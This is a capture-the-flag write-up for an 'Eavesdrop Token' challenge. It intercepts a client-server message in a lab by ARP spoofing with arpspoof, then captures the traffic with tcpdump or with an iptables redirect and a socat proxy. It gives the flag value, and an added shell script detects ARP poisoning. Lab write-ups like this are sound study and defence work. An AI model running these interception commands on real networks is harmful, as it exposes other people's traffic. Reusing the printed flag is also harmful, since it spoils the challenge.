Token 1: Eavesdrop Token

Token: PCCC{Ugh_Math_Homework_32_42fb}

Objective

Intercept the token sent by mathclient.pccc to mathserver.pccc on port 9000.

Hosts

  • mathclient.pccc: 10.0.91.132
  • mathserver.pccc: 10.0.91.130

Method: ARP Spoofing + Passive Capture

Step 1: Enable IP forwarding

sysctl -w net.ipv4.ip_forward=1

Step 2: ARP spoof both directions

arpspoof -i eth1 -t 10.0.91.132 10.0.91.130 &
arpspoof -i eth1 -t 10.0.91.130 10.0.91.132 &

Step 3: Capture traffic

Option A - tcpdump:

tcpdump -i eth1 -A host 10.0.91.132 and port 9000

Option B - socat transparent proxy:

iptables -t nat -A PREROUTING -i eth1 -s 10.0.91.132 -d 10.0.91.130 -p tcp --dport 9000 -j REDIRECT --to-port 9000
socat -v TCP-LISTEN:9000,fork,reuseaddr TCP:10.0.91.130:9000

Step 4: Wait for connection

The mathclient connects periodically. The first message it sends is:

Eavesdrop Token: PCCC{Ugh_Math_Homework_32_42fb}

Why It Works

ARP replies are not authenticated, so each host accepts the spoofed replies and maps the other host's IP to your MAC address. Traffic between them then flows through your machine, and with IP forwarding enabled it is relayed transparently. From that position you can passively observe the traffic (Option A) or actively intercept it (Option B).
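
The same mechanism seen from the defending side, as an added example that is not part of the original writeup: a check a target host such as mathclient.pccc can run over its own neighbour table. The function names, the baseline file format, the address 10.0.91.50 and all MAC addresses are assumptions made up for the example.

```bash
#!/bin/sh
# Added example, not part of the original writeup. Run on a host that may be
# a spoofing target (here: mathclient.pccc) to check its neighbour table.

# check_neigh BASELINE   (stdin: output of `ip -4 neigh show`)
#   BASELINE holds known-good "<ip> <mac>" pairs, assumed to have been
#   recorded while the segment was trusted.
# Prints "MISMATCH ..." when a pinned IP resolves to another MAC and
# "SHARED ..." when one MAC answers for several IPs. Returns 1 if flagged.
check_neigh() {
  awk -v base="$1" '
    FILENAME == base { if (NF >= 2) want[$1] = tolower($2); next }
    {
      mac = ""
      for (i = 2; i < NF; i++) if ($i == "lladdr") mac = tolower($(i + 1))
      if (mac == "") next               # FAILED/INCOMPLETE: no MAC learned
      if (($1 in want) && want[$1] != mac) {
        printf "MISMATCH %s expected=%s observed=%s\n", $1, want[$1], mac
        bad = 1
      }
      if (!count[mac]++) { order[++n] = mac; ips[mac] = $1 } else ips[mac] = ips[mac] "," $1
    }
    END {
      for (j = 1; j <= n; j++) if (count[order[j]] > 1) {
        print "SHARED", order[j], ips[order[j]]; bad = 1
      }
      exit bad + 0
    }
  ' "$1" -
}

# Constructed sample data. The MACs and 10.0.91.50 are made up; the other
# address is the server named in this writeup.
sample_baseline() { echo "10.0.91.130 02:00:00:00:00:30"; }
sample_neigh() {
  cat <<'EOF'
10.0.91.130 dev eth0 lladdr 02:00:00:00:00:66 REACHABLE
10.0.91.50 dev eth0 lladdr 02:00:00:00:00:66 STALE
10.0.91.1 dev eth0 FAILED
EOF
}

base=$(mktemp)
sample_baseline > "$base"
sample_neigh | check_neigh "$base" || echo "neighbour table looks poisoned"
rm -f "$base"
```

On a live host, pipe `ip -4 neigh show` into check_neigh instead of the constructed sample.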

Cleanup

pkill arpspoof
iptables -t nat -D PREROUTING -i eth1 -s 10.0.91.132 -d 10.0.91.130 -p tcp --dport 9000 -j REDIRECT --to-port 9000